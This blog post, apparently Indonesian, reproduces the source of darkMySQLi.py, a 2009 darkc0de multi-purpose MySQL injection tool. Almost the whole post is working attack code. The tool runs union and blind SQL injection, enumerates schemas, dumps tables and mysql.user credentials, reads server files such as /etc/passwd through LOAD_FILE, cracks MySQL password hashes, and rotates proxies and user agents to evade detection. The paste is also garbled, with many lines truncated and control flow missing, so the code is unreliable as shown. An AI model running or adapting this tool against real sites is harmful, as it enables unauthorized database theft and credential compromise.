[POC] darkMySQLi.py

Well jumpa lagi dengan saya :D Kali ini akan saya bahas mengenai POC darkMySQLi, caranya sama aja dengan schemafuzz.py. Berikut source code-nya:

# 1/30/09
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
# Multi-Purpose MySQL Injection Tool
# *union injection
# *blind injection
# *post and get method injection ** POST not working yet
# *full information_schema enumeration
# *table and column fuzzer
# *database information extractor
# *column length finder
# *load_file fuzzer
# *general info gathering
# *MySQL hash cracker
# *Round Robin Proxy w/ a proxy list (non-auth or auth proxies)
# *Proxy Auth (works great with Squid w/ basic auth)
# *Random browser agent chosen everytime the script runs
# *debug mode for seeing every URL request, proxy used, browser agent used

# Share the c0de! (f*ck Windows! Get a real OS!)

# darkc0de Crew
# www.darkc0de.com
# rsauron[at]gmail[dot]com

# Greetz to
# d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx, rechemen
# and the darkc0de crew

# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!

# 1.6 ADDED --end evasion setting
# 1.5 Fixed --strart now starts at correct number instead of +1
# 1.4 Fixed schema mode when a table was specified - app would hand after last column
# 1.3 Fixed Regular Expression Search in dump mode (should fixs issues of crazy html code when dumping)
# 1.2 Fixed mode findcol - the way it replaced darkc0de in the output URL string


import urllib, sys, re, os, socket, httplib, urllib2, time, random

##Set default evasion options here
arg_end = "--" # examples "--", "/*", "#", "", "--&SESSIONID=00hn3gvs21lu5ke2f03bxr" <-- if you need vars after inj point
arg_eva = "+" # examples "/**/" ,"+", "%20"
## colMax variable for column Finder
colMax = 200
## Set the default timeout value for requests
## Default Log File Name
logfile = "darkMySQLi.log"
## File Location to fuzz with for TABLE fuzzer
tablefuzz = "tablesfuzz.txt"
## File Location to fuzz with for COLUMN fuzzer
columnfuzz = "columnsfuzz.txt"
## File Location to fuzz with for LOAD_FILE fuzzer
loadfilefuzz = "loadfilefuzz.txt"
## Agents
agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Opera/8.00 (Windows NT 5.1; U; en)"]

#URL Get Function
def GetThatShit(head_URL):
source = ""
global gets;global proxy_num
head_URL = head_URL.replace("+",arg_eva)
request_web = urllib2.Request(head_URL)
while len(source) <>
if arg_debug == "on":
print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
source = proxy_list[proxy_num % proxy_len].open(request_web).read()
except (KeyboardInterrupt, SystemExit):
except (urllib2.HTTPError):
print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!"
print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!"
print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
return source

#the guts and glory - Binary Algorithim that does all the guessing for the Blind Methodology
def GuessValue(URL):
lower = lower_bound;upper = upper_bound
while lower <>
mid = (lower + upper) / 2
head_URL = URL + ">"+str(mid)
source = GetThatShit(head_URL)
match = re.findall(arg_string,source)
if len(match) >= 1:
lower = mid + 1
upper = mid
except (KeyboardInterrupt, SystemExit):

if lower > lower_bound and lower <>
value = lower
head_URL = URL + "="+str(lower)
source = GetThatShit(head_URL)
match = re.findall(arg_string,source)
if len(match) >= 1:
value = lower
value = 63
print "Could not find the ascii character! There must be a problem.."
print "Check to make sure your using the my script right!"
print "READ xprog's blind sql tutorial!\n"
return value

## Functions for MySQL5 hash cracking --- THANKS d3hydr8
def c1(word):
s = hashlib.sha1()
s2 = hashlib.sha1()
return s2.hexdigest()

def c2(word):
s = sha.new()
s2 = sha.new()
return s2.hexdigest()

## Funtion for MySQL323 hash cracking
def mysql323(clear):
# Taken almost verbatim from mysql's source
nr = 1345345333
add = 7
nr2 = 0x12345671
retval = ""
for c in clear:
if c == ' ' or c == '\t':
tmp = ord(c)
nr ^= (((nr & 63) + add) * tmp) + (nr <<>
nr2 += (nr2 <<>
add += tmp
res1 = nr & ((1 <<>
res2 = nr2 & ((1 <<>
return "%08lx%08lx" % (res1, res2)

#say hello
if len(sys.argv) <= 1:
print "\n|--------------------------------------------------|"
print "| rsauron@gmail.com v1.6 |"
print "| 1/2009 darkMySQLi.py |"
print "| -- Multi Purpose MySQL Injection Tool -- |"
print "| Usage: darkMySQLi.py [options] |"
print "| -h help darkc0de.com |"
print "|--------------------------------------------------|\n"

#help option
for arg in sys.argv:
if arg == "-h" or arg == "--help":
print "\n darkMySQLi v1.6 rsauron@gmail.com"
print " forum.darkc0de.com"
print "Usage: ./darkMySQLi.py [options]"
print "Options:"
print " -h, --help shows this help message and exits"
print " -d, --debug display URL debug information\n"
print " Target:"
print " -u URL, --url=URL Target url\n"
print " Methodology:"
print " -b, --blind Use blind methodology (req: --string)"
print " -s, --string String to match in page when the query is valid"
print " Method:"
print " --method=PUT Select to use PUT method ** NOT WORKING"
print " Modes:"
print " --dbs Enumerate databases MySQL v5+"
print " --schema Enumerate Information_schema (req: -D,"
print " opt: -T) MySQL v5+"
print " --full Enumerate all we can MySQL v5+"
print " --info MySQL Server configuration MySQL v4+"
print " --fuzz Fuzz Tables & Columns Names MySQL v4+"
print " --findcol Find Column length MySQL v4+"
print " --dump Dump database table entries (req: -T,"
print " opt: -D, -C, --start) MySQL v4+"
print " --crack=HASH Crack MySQL Hashs (req: --wordlist)"
print " --wordlist=LIS.TXT Wordlist to be used for cracking"
print " Define:"
print " -D DB database to enumerate"
print " -T TBL database table to enumerate"
print " -C COL database table column to enumerate"
print " Optional:"
print " --ssl To use SSL"
print " --end To use + and -- for the URLS --end \"--\" (Default)"
print " To use /**/ and /* for the URLS --end \"/*\""
print " --rowdisp Do not display row # when dumping"
print " --start=ROW Row number to begin dumping at"
print " --where=COL,VALUE Use a where clause in your dump"
print " --orderby=COL Use a orderby clause in your dump"
print " --cookie=FILE.TXT Use a Mozilla cookie file"
print " --proxy=PROXY Use a HTTP proxy to connect to the target url"
print " --output=FILE.TXT Output results of tool to this file\n"

#define variables
site = ""
proxy = ""
arg_string = ""
arg_blind = "--union"
arg_table = "None"
arg_database = "None"
arg_columns = "None"
arg_row = "Rows"
arg_cookie = "None"
arg_insert = "None"
arg_where = ""
arg_orderby = ""
arg_debug = "off"
arg_rowdisp = 1
arg_adminusers = 10
arg_wordlist = ""
arg_ssl = "off"
arg_proxy_auth = ""
darkc0de = "concat(0x1e,0x1e,"
mode = "None"
lower_bound = 0
upper_bound = 16069
line_URL = ""
count_URL = ""
cur_db = ""
cur_table = ""
terminal = ""
count = 0
gets = 0
table_num = 0
num = 0
ser_ver = 3
version =[]
let_pos = 1
lim_num = 0
agent = ""

#Check args
for arg in sys.argv:
if arg == "-u" or arg == "--url":
site = sys.argv[count+1]
elif arg == "--output":
logfile = sys.argv[count+1]
elif arg == "--proxy":
proxy = sys.argv[count+1]
elif arg == "--proxyauth":
arg_proxy_auth = sys.argv[count+1]
elif arg == "--dump":
mode = arg;arg_dump = sys.argv[count]
elif arg == "--full":
mode = arg
elif arg == "--schema":
mode = arg;arg_schema = sys.argv[count]
elif arg == "--dbs":
mode = arg;arg_dbs = sys.argv[count]
elif arg == "--fuzz":
mode = arg;arg_fuzz = sys.argv[count]
elif arg == "--info":
mode = arg;arg_info = sys.argv[count]
elif arg == "--crack":
mode = arg;arg_hash = sys.argv[count+1]
elif arg == "--wordlist":
arg_wordlist = sys.argv[count+1]
elif arg == "--findcol":
mode = arg;arg_findcol = sys.argv[count]
elif arg == "--cookie":
arg_cookie = sys.argv[count+1]
elif arg == "--ssl":
arg_ssl = "on"
elif arg == "-b" or arg == "--blind":
arg_blind = arg;arg_blind = sys.argv[count]
elif arg == "-s" or arg == "--string":
arg_string = sys.argv[count+1]
elif arg == "-D":
arg_database = sys.argv[count+1]
elif arg == "-T":
arg_table = sys.argv[count+1]
elif arg == "-C":
arg_columns = sys.argv[count+1]
elif arg == "--start":
num = int(sys.argv[count+1]) - 1
table_num = num
elif arg == "-d" or arg == "--debug":
arg_debug = "on"
elif arg == "--where":
arg_where = sys.argv[count+1]
elif arg == "--orderby":
arg_orderby = sys.argv[count+1]
elif arg == "--rowdisp":
arg_rowdisp = sys.argv[count]
arg_rowdisp = 0
elif arg == "--end":
arg_end = sys.argv[count+1]
if arg_end == "--":
arg_eva = "+"
arg_eva = "/**/"

#Title write
file = open(logfile, "a")
print "\n|--------------------------------------------------|"
print "| rsauron@gmail.com v1.6 |"
print "| 1/2009 darkMySQLi.py |"
print "| -- Multi Purpose MySQL Injection Tool -- |"
print "| Usage: darkMySQLi.py [options] |"
print "| -h help darkc0de.com |"
print "|--------------------------------------------------|\n"

#Arg Error Checking
if mode != "--crack" and site == "":
print "[-] URL is required!\n[-] Need Help? --help\n"
if mode == "None":
print "[-] Mode is required!\n[-] Need Help? --help\n"
if mode == "--schema" and arg_database == "None":
print "[-] Must include -D flag!\n[-] Need Help? --help\n"
if mode == "--dump":
if arg_table == "None" or arg_columns == "None":
print "[-] Must include -T and -C flag. -D is Optional\n[-] Need Help? --help\n"
if proxy != "None":
if len(proxy.split(".")) == 2:
proxy = open(proxy, "r").read()
if proxy.endswith("\n"):
proxy = proxy.rstrip("\n")
proxy = proxy.split("\n")
if arg_ssl == "off":
if site[:4] != "http":
site = "http://"+site
if site[:5] != "https":
site = "https://"+site
if site.endswith("/*"):
site = site.rstrip('/*')
if site.endswith("--"):
site = site.rstrip('--')
if arg_cookie != "None":
cj = cookielib.MozillaCookieJar()
cookie_handler = urllib2.HTTPCookieProcessor(cj)
print "[!] There was a problem loading your cookie file!"
print "[!] Make sure the cookie file is in Mozilla Cookie File Format!"
print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n"
cookie_handler = urllib2.HTTPCookieProcessor()
if mode != "--findcol" and arg_blind != "--blind" and mode != "--crack" and site.find("darkc0de") == -1:
print "[-] Site must contain \'darkc0de\'\n"
if arg_blind == "--blind" and arg_string == "":
print "[-] You must specify a --string when using blind methodology.\n"
if arg_columns != "None":
arg_columns = arg_columns.split(",")
if arg_insert != "None":
arg_insert = arg_insert.split(",")
if mode == "--crack" and arg_wordlist == "":
print "[-] You must specify a --wordlist to crack with.\n"
agent = random.choice(agents)

file.write("\n| rsauron@gmail.com v1.6 |")
file.write("\n| 1/2009 darkMySQLi.py |")
file.write("\n| -- Multi Purpose MySQL Injection Tool -- |")
file.write("\n| Usage: darkMySQLi.py [options] |")
file.write("\n| -h help darkc0de.com |")

## MySQL Hash cracking
if mode == "--crack":
arg_wordlist = open(arg_wordlist, "r")
print "[-] Error: Check your wordlist path\n";file.write("\n[-] Error: Check your wordlist path\n")
if len(arg_hash) != 40 and len(arg_hash) != 16:
print "\n[-] Improper hash length\n";file.write("\n\n[-] Improper hash length\n")
arg_wordlist = arg_wordlist.readlines()
print "[+] Words Loaded:",len(arg_wordlist);file.write("\n[+] Words Loaded: "+str(len(arg_wordlist)))
if len(arg_hash) == 40:
print "[+] Detected MySQL v5 Hash:",arg_hash;file.write("\n[+] Detected MySQL v5 Hash: "+arg_hash)
import hashlib
for word in arg_wordlist:
if arg_hash == c1(word):
print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word)
import sha
for word in arg_wordlist:
if arg_hash == c2(word):
print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word)
print "[+] Detected MySQL v4 Hash:",arg_hash
print "[+] Try darkc0de hash database @ "
for word in arg_wordlist:
word = word.rstrip("\n")
if arg_hash == mysql323(word):
print "\n[!] Password is:",word+"\n";file.write("\n\n[!] Password is: "+word+"\n")
print "[-] Finished Searching..\n[-] Done\n";file.write("\n[-] Finished Searching..\n[-] Done\n")

#General Info
print "[+] URL:",site;file.write("\n\n[+] URL: "+site)
print "[+] %s" % time.strftime("%X");file.write("\n[+] %s" % time.strftime("%X"))
print "[+] Evasion:",arg_eva,arg_end;file.write("\n[+] Evasion: "+arg_eva+" "+arg_end)
print "[+] Cookie:", arg_cookie;file.write("\n[+] Cookie: "+arg_cookie)
if site[:5] == "https":
print "[+] SSL: Yes";file.write("\n[+] SSL: Yes")
print "[+] SSL: No";file.write("\n[+] SSL: No")
print "[+] Agent:",agent;file.write("\n[+] Agent: "+agent)

#Build proxy list
proxy_list = [];proxy_list_count = []
if proxy != "None":
print "[+] Building Proxy List...";file.write("\n[+] Building Proxy List...")
for p in proxy:
match = re.findall(":",p)
if len(match) == 3:
arg_proxy_auth = []
prox = p.split(":")
arg_proxy_auth += prox
if arg_proxy_auth != "":
proxy_auth_handler = urllib2.HTTPBasicAuthHandler()
opener = urllib2.build_opener(proxy_auth_handler)
proxy_list.append(urllib2.build_opener(proxy_auth_handler, cookie_handler))
proxy_list_count.append(p);arg_proxy_auth = ""
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
opener = urllib2.build_opener(proxy_handler)
proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler))
if len(match) == 3 or len(match) == 1:
print "\tProxy:",p,"- Success";file.write("\n\tProxy:"+p+" - Success")
print "\tProxy:",p,arg_proxy_auth[2]+":"+arg_proxy_auth[3]+"- Success";file.write("\n\tProxy:"+p+" - Success")
print "\tProxy:",p,"- Failed [ERROR]:",sys.exc_info()[0];file.write("\n\tProxy:"+p+" - Failed [ERROR]: "+str(sys.exc_info()[0]))
if len(proxy_list) == 0:
print "[-] All proxies have failed. App Exiting"
print "[+] Proxy List Complete";file.write("\n[+] Proxy List Complete")
print "[-] Proxy Not Given";file.write("\n[+] Proxy Not Given")
proxy_num = 0
proxy_len = len(proxy_list)

## Blind String checking!
if arg_blind == "--blind":
print "[!] Blind Methodology will be used!";file.write("\n[!] Blind Methodology will be used!")
head_URL = site+"+AND+1=1"
source = GetThatShit(head_URL)
match = re.findall(arg_string,source)
if len(match) >= 2:
print "\n[-] The String you used has been found on the target page in-use more than 2 times"
print "[-] This might lead to false positives with the blind methodology"
print "[-] Might not mean anything.. I am just trying to help out.."
print "[-] If you have problems you might know why.. ;-)\n"
if len(match) == 0:
print "\n[-] The String you used has not been found in the target URL!\n[-] Please try another.\n[-] Done.\n"
if len(match) == 1:
print "[+] Blind String Selected is Good ;-)";file.write("\n[+] Blind String Selected is Good ;-)")

#Column Finder c0de
if mode == "--findcol":
print "[+] Attempting To find the number of columns...";file.write("\n[+] Attempting To find the number of columns...")
print "[+] Testing: ",
file.write("\n[+] Testing: ",)
checkfor=[];nullFound=[];nullnum=[];makepretty = ""
sitenew = site+"+AND+1=2+UNION+SELECT+"
for x in xrange(1,colMax):
sys.stdout.write("%s," % (x))
darkc0de = "dark"+str(x)+"code"
if x > 1:
sitenew += ","
sitenew += "0x"+darkc0de.encode("hex")
finalurl = sitenew+arg_end
source = GetThatShit(finalurl)
for y in checkfor:
colFound = re.findall(y,source)
if len(colFound) != 0:
if len(nullFound) >= 1:
print "\n[+] Column Length is:",len(checkfor);file.write("\n[+] Column Length is: "+str(len(checkfor)))
print "[+] Found null column at column #: ",;file.write("\n[+] Found null column at column #: ",)
for z in nullFound:
nullcol = re.findall(("\d+"),z)
sys.stdout.write("%s," % (nullcol[0]))
for z in xrange(0,len(checkfor)):
if z > 1:
makepretty += ","
makepretty += str(z)
site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty+arg_end
print "\n\n[!] SQLi URL:",site;file.write("\n\n[!] SQLi URL: "+site)
for z in nullnum:
site = site.replace("+"+z+",","+darkc0de,")
site = site.replace(","+z+",",",darkc0de,")
site = site.replace(","+z+arg_end,",darkc0de"+arg_end)
print "[!] darkMySQLi URL:",site;file.write("\n[!] darkMySQLi URL: "+site)
print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
print "[-] Done\n";file.write("\n[-] Done\n")
print "Don't forget to check", logfile,"\n"
except (KeyboardInterrupt, SystemExit):

print "\n[!] Sorry Column Length could not be found."
file.write("\n[!] Sorry Column Length could not be found.")
print "[-] You might try to change colMax variable or change evasion option.. or last but not least do it manually!"
print "[-] Done\n"

#Retrieve version:user:database
if arg_blind != "--blind":
head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
print "[+] Gathering MySQL Server Configuration...";file.write("\n[+] Gathering MySQL Server Configuration...\n")
source = GetThatShit(head_URL)
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
match = match[0][0:].split("\x1e")
version = match[2]
user = match[3]
database = match[4]
print "\tDatabase:", database;file.write("\tDatabase: "+database+"\n")
print "\tUser:", user;file.write("\tUser: "+user+"\n")
print "\tVersion:", version;file.write("\tVersion: "+version)
print "\n[-] There seems to be a problem with your URL. Please check and try again.\n[DEBUG]:",head_URL.replace("+",arg_eva),"\n"
print "[+] Preforming Quick MySQL Version Check...";file.write("\n[+] Preforming Quick MySQL Version Check...")
while 1:
config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver)
source = GetThatShit(config_URL)
match = re.findall(arg_string,source)
if len(match) >= 1:
print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!";file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!")
version += str(ser_ver)
if ser_ver == 6:
print "[-] Was unable to determine MySQL version.\n[-] Done"

#lets check what we can do based on version
if mode == "--schema" or mode == "--dbs" or mode == "--full":
if version[0] == str(4):
print "\n[-] Mode Selected is incompatible with MySQL v4 Servers"
print "[-] -h for help"

# Mode --info
if mode == "--info" and arg_blind != "--blind":
head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+mysql.user"+arg_end
source = GetThatShit(head_URL)
match = re.findall("darkc0de",source)
if len(match) >= 1:
yesno = "YES <-- w00t w00t"
yesno = "NO"
print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
if yesno == "YES <-- w00t w00t":
print "\n[+] Dumping MySQL user info. host:user:password";file.write("\n\n[+] Dumping MySQL user info. host:user:password")
head_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+mysql.user"+arg_end
source = GetThatShit(head_URL)
match = re.findall("\x1e\x1e\S+",source);match = match[0].strip("\x1e").split("\x1e");userend = match[0]
print "[+] Number of users in the mysql.user table:",userend;file.write("[+] Number of users in the mysql.user table: "+str(userend))
head_URL = site.replace("darkc0de","concat(0x1e,0x1e,host,0x1e,user,0x1e,password,0x1e,0x20)")
head_URL = head_URL+"+FROM+mysql.user+LIMIT+NUM,1"+arg_end
for x in range(0,int(userend)):
source = GetThatShit(head_URL.replace("NUM",str(x)))
match = re.findall("\x1e\x1e\S+",source)
match = match[0].strip("\x1e").split("\x1e")
if len(match) != 3:
nullvar = "NULL"
match += nullvar
print "\t["+str(x)+"]",match[0]+":"+match[1]+":"+match[2];file.write("\n["+str(x)+"] "+str(match[0])+":"+str(match[1])+":"+str(match[2]))
except (KeyboardInterrupt, SystemExit):
print "\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!"
file.write("\n\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!")
head_URL = site.replace("darkc0de","concat(load_file(0x2f6574632f706173737764),0x3a,0x6461726b63306465)")+arg_end
source = GetThatShit(head_URL)
match = re.findall("darkc0de",source)
if len(match) >= 1:
yesno = "YES <-- w00t w00t"
yesno = "NO"
print "\n[+] Do we have Access to Load_File:",yesno;file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno))
if yesno == "YES <-- w00t w00t":
fuzz_load = open(loadfilefuzz, "r").readlines()
head_URL = site.replace("darkc0de","concat(load_file('%2Fetc%2Fpasswd'),0x3a,0x6461726b63306465)")+arg_end
source = GetThatShit(head_URL)
match = re.findall("darkc0de",source)
if len(match) > 1:
onoff = "OFF <-- w00t w00t"
onoff = "ON"
print "\n[+] Magic quotes are:",onoff
yesno = str(raw_input("\n[!] Would You like to fuzz LOAD_FILE (Yes/No): "))
if yesno == "Y" or yesno == "y" or yesno == "Yes" or yesno == "yes":
print "\n[+] Starting Load_File Fuzzer...";file.write("\n\n[+] Starting Load_File Fuzzer...")
print "[+] Number of system files to be fuzzed:",len(fuzz_load),"\n";file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_load))+"\n")
for sysfile in fuzz_load:
sysfile = sysfile.rstrip("\n")
if proxy != "None":
sysfile = sysfile.replace("/","%2F")
sysfile = sysfile.replace(".","%2E")
if onoff == "OFF <-- w00t w00t":
head_URL = site.replace("darkc0de","concat(LOAD_FILE(\'"+sysfile+"\'),0x3a,0x6461726b63306465)")+arg_end
head_URL = site.replace("darkc0de","concat(LOAD_FILE(0x"+sysfile.encode("hex")+"),0x3a,0x6461726b63306465)")+arg_end
source = GetThatShit(head_URL)
match = re.findall("darkc0de",source)
if len(match) > 0:
print "[!] Found",sysfile;file.write("\n[!] Found "+sysfile)
head_URL = head_URL.replace("concat(","")
head_URL = head_URL.replace(",0x3a,0x6461726b63306465)","")
print "[!]",head_URL;file.write("\n[!] "+head_URL)
print "\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!"
file.write("\n\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!")

#Fuzz table/columns
if mode == "--fuzz":
fuzz_tables = open(tablefuzz, "r").readlines()
fuzz_columns = open(columnfuzz, "r").readlines()
print "[+] Beginning table and column fuzzer...";file.write("[+] Beginning table and column fuzzer...")
print "[+] Number of tables names to be fuzzed:",len(fuzz_tables);file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables)))
print "[+] Number of column names to be fuzzed:",len(fuzz_columns);file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns)))
print "[+] Searching for tables and columns...";file.write("\n[+] Searching for tables and columns...")
if arg_blind == "--blind":
fuzz_URL = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1"
fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+TABLE"+arg_end
for table in fuzz_tables:
table = table.rstrip("\n")
table_URL = fuzz_URL.replace("TABLE",table)
source = GetThatShit(table_URL)
if arg_blind == "--blind":
match = re.findall(arg_string,source)
match = re.findall("darkc0de", source);
if len(match) > 0:
print "\n[!] Found a table called:",table;file.write("\n\n[+] Found a table called: "+str(table))
print "\n[+] Now searching for columns inside table \""+table+"\"";file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
if arg_blind == "--blind":
table_URL = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1"
for column in fuzz_columns:
column = column.rstrip("\n")
if arg_blind == "--blind":
column_URL = table_URL.replace("COLUMN",column)
column_URL = table_URL.replace("0x6461726b63306465","concat(0x6461726b63306465,0x3a,"+column+")")
source = GetThatShit(column_URL)
if arg_blind == "--blind":
match = re.findall(arg_string,source)
match = re.findall("darkc0de",source)
if len(match) > 0:
print "[!] Found a column called:",column;file.write("\n[!] Found a column called:"+column)
print "[-] Done searching inside table \""+table+"\" for columns!";file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")

#Build URLS for each different mode
if mode == "--schema":
if arg_database != "None" and arg_table == "None":
if arg_blind == "--blind":
print "[+] Showing Tables from database \""+arg_database+"\"";file.write("\n[+] Showing Tables from database \""+arg_database+"\"")
count_URL = site+"+and+((SELECT+COUNT(table_name)"
count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")+"))"
line_URL = site+"+and+ascii(substring((SELECT+table_name"
line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")
print "[+] Showing Tables & Columns from database \""+arg_database+"\""
file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"")
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += "+FROM+information_schema.columns+WHERE+table_schema=0x"+arg_database.encode("hex")
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)")
count_URL += "+FROM+information_schema.tables+WHERE+table_schema=0x"+arg_database.encode("hex")
arg_row = "Tables"
if arg_database != "None" and arg_table != "None":
if arg_blind == "--blind":
print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\""
file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
count_URL = site+"+and+((SELECT+COUNT(column_name)"
count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")+"))"
line_URL = site+"+and+ascii(substring((SELECT+column_name"
line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\""
file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
arg_row = "Columns"

elif mode == "--dump":
print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
print "[+] and Column(s) "+str(arg_columns);file.write("\n[+] Column(s) "+str(arg_columns))
if arg_blind == "--blind":
darkc0de = ""
for column in arg_columns:
darkc0de += column+",0x3a,"
darkc0de = darkc0de.rstrip("0x3a,")
count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_database+"."+arg_table
line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_database+"."+arg_table
for column in arg_columns:
darkc0de += column+",0x1e,"
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table
line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table
if arg_where != "" or arg_orderby != "":
if arg_where != "":
arg_where = arg_where.split(",")
print "[+] WHERE clause:","\""+arg_where[0]+"="+arg_where[1]+"\""
arg_where = "WHERE+"+arg_where[0]+"="+"0x"+arg_where[1].encode("hex")
if arg_orderby != "":
arg_orderby = "ORDER+BY+'"+arg_orderby+"'"
print "[+] ORDERBY clause:",arg_orderby
count_URL += "+"+arg_where
line_URL += "+"+arg_where+"+"+arg_orderby
if version[0] == 4:
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_table
line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_table

elif mode == "--full":
print "[+] Starting full SQLi information_schema enumeration..."
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex")
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex")

elif mode == "--dbs":
print "[+] Showing all databases current user has access too!"
file.write("\n[+] Showing all databases current user has access too!")
if arg_blind == "--blind":
count_URL = site+"+and+((SELECT+COUNT(schema_name)"
count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))"
line_URL = site+"+and+ascii(substring((SELECT+schema_name"
line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex")
line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)")
line_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex")
arg_row = "Databases"

if arg_blind == "--blind":
count_URL += arg_end
line_URL += "+LIMIT+NUM,1"+arg_end

## Blind Info --- I know it doesnt make sence where this code is.. but.. fuck it...
if mode == "--info" and arg_blind == "--blind":
head_URL = site+"+and+(SELECT+1+from+mysql.user+limit+0,1)=1"
source = GetThatShit(head_URL)
match = re.findall(arg_string,source)
if len(match) >= 1:
